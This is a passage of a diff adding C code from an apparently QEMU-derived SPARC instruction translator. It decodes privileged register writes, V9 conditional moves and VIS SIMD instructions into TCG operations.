case 0x11: /* Performance Instrumentation + Counter */ + case 0x12: /* Dispatch Control */ +#endif + default: + goto illegal_insn; + } + } + break; +#if !defined(CONFIG_USER_ONLY) + case 0x31: /* wrpsr, V9 saved, restored */ + { + if (!supervisor(dc)) + goto priv_insn; +#ifdef TARGET_SPARC64 + switch (rd) { + case 0: + gen_helper_saved(tcg_ctx, tcg_ctx->cpu_env); + break; + case 1: + gen_helper_restored(tcg_ctx, tcg_ctx->cpu_env); + break; + case 2: /* UA2005 allclean */ + case 3: /* UA2005 otherw */ + case 4: /* UA2005 normalw */ + case 5: /* UA2005 invalw */ + // XXX + default: + goto illegal_insn; + } +#else + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + gen_helper_wrpsr(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_FLAGS); + dc->cc_op = CC_OP_FLAGS; + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; +#endif + } + break; + case 0x32: /* wrwim, V9 wrpr */ + { + if (!supervisor(dc)) + goto priv_insn; + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); +#ifdef TARGET_SPARC64 + switch (rd) { + case 0: // tpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 1: // tnpc + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tnpc)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 2: // tstate + { + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, + tstate)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 3: // tt + 
{ + TCGv_ptr r_tsptr; + + r_tsptr = tcg_temp_new_ptr(tcg_ctx); + gen_load_trap_state_at_tl(dc, r_tsptr, tcg_ctx->cpu_env); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, r_tsptr, + offsetof(trap_state, tt)); + tcg_temp_free_ptr(tcg_ctx, r_tsptr); + } + break; + case 4: // tick + { + TCGv_ptr r_tickptr; + + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tick)); + gen_helper_tick_set_count(tcg_ctx, r_tickptr, + cpu_tmp0); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 5: // tba + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tbr, cpu_tmp0); + break; + case 6: // pstate + save_state(dc); + gen_helper_wrpstate(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + dc->npc = DYNAMIC_PC; + break; + case 7: // tl + save_state(dc); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, tl)); + dc->npc = DYNAMIC_PC; + break; + case 8: // pil + gen_helper_wrpil(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 9: // cwp + gen_helper_wrcwp(tcg_ctx, tcg_ctx->cpu_env, cpu_tmp0); + break; + case 10: // cansave + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + cansave)); + break; + case 11: // canrestore + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + canrestore)); + break; + case 12: // cleanwin + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + cleanwin)); + break; + case 13: // otherwin + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + otherwin)); + break; + case 14: // wstate + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, + wstate)); + break; + case 16: // UA2005 gl + CHECK_IU_FEATURE(dc, GL); + tcg_gen_st32_tl(tcg_ctx, cpu_tmp0, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, gl)); + break; + case 26: // UA2005 strand status + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + tcg_gen_mov_tl(tcg_ctx, 
*(TCGv *)tcg_ctx->cpu_ssr, cpu_tmp0); + break; + default: + goto illegal_insn; + } +#else + tcg_gen_trunc_tl_i32(tcg_ctx, *(TCGv *)tcg_ctx->cpu_wim, cpu_tmp0); + if (dc->def->nwindows != 32) { + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_wim, *(TCGv *)tcg_ctx->cpu_wim, + (1 << dc->def->nwindows) - 1); + } +#endif + } + break; + case 0x33: /* wrtbr, UA2005 wrhpr */ + { +#ifndef TARGET_SPARC64 + if (!supervisor(dc)) + goto priv_insn; + tcg_gen_xor_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_tbr, cpu_src1, cpu_src2); +#else + CHECK_IU_FEATURE(dc, HYPV); + if (!hypervisor(dc)) + goto priv_insn; + cpu_tmp0 = get_temp_tl(dc); + tcg_gen_xor_tl(tcg_ctx, cpu_tmp0, cpu_src1, cpu_src2); + switch (rd) { + case 0: // hpstate + // XXX gen_op_wrhpstate(); + save_state(dc); + gen_op_next_insn(dc); + tcg_gen_exit_tb(tcg_ctx, 0); + dc->is_br = 1; + break; + case 1: // htstate + // XXX gen_op_wrhtstate(); + break; + case 3: // hintp + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_hintp, cpu_tmp0); + break; + case 5: // htba + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_htba, cpu_tmp0); + break; + case 31: // hstick_cmpr + { + TCGv_ptr r_tickptr; + + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_hstick_cmpr, cpu_tmp0); + r_tickptr = tcg_temp_new_ptr(tcg_ctx); + tcg_gen_ld_ptr(tcg_ctx, r_tickptr, tcg_ctx->cpu_env, + offsetof(CPUSPARCState, hstick)); + gen_helper_tick_set_limit(tcg_ctx, r_tickptr, + *(TCGv *)tcg_ctx->cpu_hstick_cmpr); + tcg_temp_free_ptr(tcg_ctx, r_tickptr); + } + break; + case 6: // hver readonly + default: + goto illegal_insn; + } +#endif + } + break; +#endif +#ifdef TARGET_SPARC64 + case 0x2c: /* V9 movcc */ + { + int cc = GET_FIELD_SP(insn, 11, 12); + int cond = GET_FIELD_SP(insn, 14, 17); + DisasCompare cmp; + TCGv dst; + + if (insn & (1 << 18)) { + if (cc == 0) { + gen_compare(dc, &cmp, 0, cond); + } else if (cc == 2) { + gen_compare(dc, &cmp, 1, cond); + } else { + goto illegal_insn; + } + } else { + gen_fcompare(dc, &cmp, cc, cond); + } + + /* The get_src2 above 
loaded the normal 13-bit + immediate field, not the 11-bit field we have + in movcc. But it did handle the reg case. */ + if (IS_IMM) { + simm = GET_FIELD_SPs(insn, 0, 10); + tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); + } + + dst = gen_load_gpr(dc, rd); + tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, + cmp.c1, cmp.c2, + cpu_src2, dst); + free_compare(tcg_ctx, &cmp); + gen_store_gpr(dc, rd, dst); + break; + } + case 0x2d: /* V9 sdivx */ + gen_helper_sdivx(tcg_ctx, cpu_dst, tcg_ctx->cpu_env, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x2e: /* V9 popc */ + gen_helper_popc(tcg_ctx, cpu_dst, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x2f: /* V9 movr */ + { + int cond = GET_FIELD_SP(insn, 10, 12); + DisasCompare cmp; + TCGv dst; + + gen_compare_reg(dc, &cmp, cond, cpu_src1); + + /* The get_src2 above loaded the normal 13-bit + immediate field, not the 10-bit field we have + in movr. But it did handle the reg case. */ + if (IS_IMM) { + simm = GET_FIELD_SPs(insn, 0, 9); + tcg_gen_movi_tl(tcg_ctx, cpu_src2, simm); + } + + dst = gen_load_gpr(dc, rd); + tcg_gen_movcond_tl(tcg_ctx, cmp.cond, dst, + cmp.c1, cmp.c2, + cpu_src2, dst); + free_compare(tcg_ctx, &cmp); + gen_store_gpr(dc, rd, dst); + break; + } +#endif + default: + goto illegal_insn; + } + } + } else if (xop == 0x36) { /* UltraSparc shutdown, VIS, V8 CPop1 */ +#ifdef TARGET_SPARC64 + int opf = GET_FIELD_SP(insn, 5, 13); + rs1 = GET_FIELD(insn, 13, 17); + rs2 = GET_FIELD(insn, 27, 31); + if (gen_trap_ifnofpu(dc)) { + goto jmp_insn; + } + + switch (opf) { + case 0x000: /* VIS I edge8cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x001: /* VIS II edge8n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 0); + 
gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x002: /* VIS I edge8lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x003: /* VIS II edge8ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 8, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x004: /* VIS I edge16cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x005: /* VIS II edge16n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x006: /* VIS I edge16lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x007: /* VIS II edge16ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 16, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x008: /* VIS I edge32cc */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x009: /* VIS II edge32n */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x00a: /* VIS I edge32lcc */ + CHECK_FPU_FEATURE(dc, VIS1); + 
cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 1, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x00b: /* VIS II edge32ln */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_edge(dc, cpu_dst, cpu_src1, cpu_src2, 32, 0, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x010: /* VIS I array8 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x012: /* VIS I array16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x014: /* VIS I array32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_helper_array8(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_shli_i64(tcg_ctx, cpu_dst, cpu_dst, 2); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x018: /* VIS I alignaddr */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_alignaddr(dc, cpu_dst, cpu_src1, cpu_src2, 0); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x01a: /* VIS I alignaddrl */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + gen_alignaddr(dc, cpu_dst, cpu_src1, cpu_src2, 1); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x019: /* VIS II bmask */ + CHECK_FPU_FEATURE(dc, VIS2); + cpu_src1 = gen_load_gpr(dc, rs1); + cpu_src2 = gen_load_gpr(dc, rs2); + tcg_gen_add_tl(tcg_ctx, cpu_dst, cpu_src1, cpu_src2); + tcg_gen_deposit_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_gsr, *(TCGv *)tcg_ctx->cpu_gsr, cpu_dst, 32, 32); + 
gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x020: /* VIS I fcmple16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmple16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x022: /* VIS I fcmpne16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpne16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x024: /* VIS I fcmple32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmple32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x026: /* VIS I fcmpne32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpne32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x028: /* VIS I fcmpgt16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpgt16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02a: /* VIS I fcmpeq16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpeq16(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02c: /* VIS I fcmpgt32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + gen_helper_fcmpgt32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x02e: /* VIS I fcmpeq32 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + cpu_src2_64 = gen_load_fpr_D(dc, rs2); + 
gen_helper_fcmpeq32(tcg_ctx, cpu_dst, cpu_src1_64, cpu_src2_64); + gen_store_gpr(dc, rd, cpu_dst); + break; + case 0x031: /* VIS I fmul8x16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16); + break; + case 0x033: /* VIS I fmul8x16au */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16au); + break; + case 0x035: /* VIS I fmul8x16al */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8x16al); + break; + case 0x036: /* VIS I fmul8sux16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8sux16); + break; + case 0x037: /* VIS I fmul8ulx16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmul8ulx16); + break; + case 0x038: /* VIS I fmuld8sux16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8sux16); + break; + case 0x039: /* VIS I fmuld8ulx16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fmuld8ulx16); + break; + case 0x03a: /* VIS I fpack32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpack32); + break; + case 0x03b: /* VIS I fpack16 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + cpu_dst_32 = gen_dest_fpr_F(dc); + gen_helper_fpack16(tcg_ctx, cpu_dst_32, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1_64); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x03d: /* VIS I fpackfix */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + cpu_dst_32 = gen_dest_fpr_F(dc); + gen_helper_fpackfix(tcg_ctx, cpu_dst_32, *(TCGv *)tcg_ctx->cpu_gsr, cpu_src1_64); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x03e: /* VIS I pdist */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDDD(dc, rd, rs1, rs2, gen_helper_pdist); + break; + case 0x048: /* VIS I faligndata */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_faligndata); + break; + 
case 0x04b: /* VIS I fpmerge */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpmerge); + break; + case 0x04c: /* VIS II bshuffle */ + CHECK_FPU_FEATURE(dc, VIS2); + gen_gsr_fop_DDD(dc, rd, rs1, rs2, gen_helper_bshuffle); + break; + case 0x04d: /* VIS I fexpand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fexpand); + break; + case 0x050: /* VIS I fpadd16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd16); + break; + case 0x051: /* VIS I fpadd16s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpadd16s); + break; + case 0x052: /* VIS I fpadd32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpadd32); + break; + case 0x053: /* VIS I fpadd32s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_add_i32); + break; + case 0x054: /* VIS I fpsub16 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub16); + break; + case 0x055: /* VIS I fpsub16s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, gen_helper_fpsub16s); + break; + case 0x056: /* VIS I fpsub32 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, gen_helper_fpsub32); + break; + case 0x057: /* VIS I fpsub32s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_sub_i32); + break; + case 0x060: /* VIS I fzero */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, 0); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + case 0x061: /* VIS I fzeros */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, 0); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x062: /* VIS I fnor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nor_i64); + break; + case 0x063: /* VIS I fnors */ + CHECK_FPU_FEATURE(dc, 
VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nor_i32); + break; + case 0x064: /* VIS I fandnot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_andc_i64); + break; + case 0x065: /* VIS I fandnot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_andc_i32); + break; + case 0x066: /* VIS I fnot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DD(dc, rd, rs2, tcg_gen_not_i64); + break; + case 0x067: /* VIS I fnot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FF(dc, rd, rs2, tcg_gen_not_i32); + break; + case 0x068: /* VIS I fandnot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_andc_i64); + break; + case 0x069: /* VIS I fandnot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_andc_i32); + break; + case 0x06a: /* VIS I fnot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DD(dc, rd, rs1, tcg_gen_not_i64); + break; + case 0x06b: /* VIS I fnot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FF(dc, rd, rs1, tcg_gen_not_i32); + break; + case 0x06c: /* VIS I fxor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_xor_i64); + break; + case 0x06d: /* VIS I fxors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_xor_i32); + break; + case 0x06e: /* VIS I fnand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_nand_i64); + break; + case 0x06f: /* VIS I fnands */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_nand_i32); + break; + case 0x070: /* VIS I fand */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_and_i64); + break; + case 0x071: /* VIS I fands */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_and_i32); + break; + case 0x072: /* VIS I fxnor */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_eqv_i64); + break; + case 0x073: /* VIS I fxnors */ + CHECK_FPU_FEATURE(dc, 
VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_eqv_i32); + break; + case 0x074: /* VIS I fsrc1 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs1); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x075: /* VIS I fsrc1s */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_32 = gen_load_fpr_F(dc, rs1); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x076: /* VIS I fornot2 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_orc_i64); + break; + case 0x077: /* VIS I fornot2s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_orc_i32); + break; + case 0x078: /* VIS I fsrc2 */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_64 = gen_load_fpr_D(dc, rs2); + gen_store_fpr_D(dc, rd, cpu_src1_64); + break; + case 0x079: /* VIS I fsrc2s */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_src1_32 = gen_load_fpr_F(dc, rs2); + gen_store_fpr_F(dc, rd, cpu_src1_32); + break; + case 0x07a: /* VIS I fornot1 */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs2, rs1, tcg_gen_orc_i64); + break; + case 0x07b: /* VIS I fornot1s */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs2, rs1, tcg_gen_orc_i32); + break; + case 0x07c: /* VIS I for */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_DDD(dc, rd, rs1, rs2, tcg_gen_or_i64); + break; + case 0x07d: /* VIS I fors */ + CHECK_FPU_FEATURE(dc, VIS1); + gen_ne_fop_FFF(dc, rd, rs1, rs2, tcg_gen_or_i32); + break; + case 0x07e: /* VIS I fone */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_64 = gen_dest_fpr_D(dc, rd); + tcg_gen_movi_i64(tcg_ctx, cpu_dst_64, -1); + gen_store_fpr_D(dc, rd, cpu_dst_64); + break; + case 0x07f: /* VIS I fones */ + CHECK_FPU_FEATURE(dc, VIS1); + cpu_dst_32 = gen_dest_fpr_F(dc); + tcg_gen_movi_i32(tcg_ctx, cpu_dst_32, -1); + gen_store_fpr_F(dc, rd, cpu_dst_32); + break; + case 0x080: /* VIS I shutdown */ + case 0x081: /* VIS II siam */ + // XXX + goto illegal_insn; + default: + goto illegal_insn; + } +#else + goto ncp_insn; +#endif + } else if 
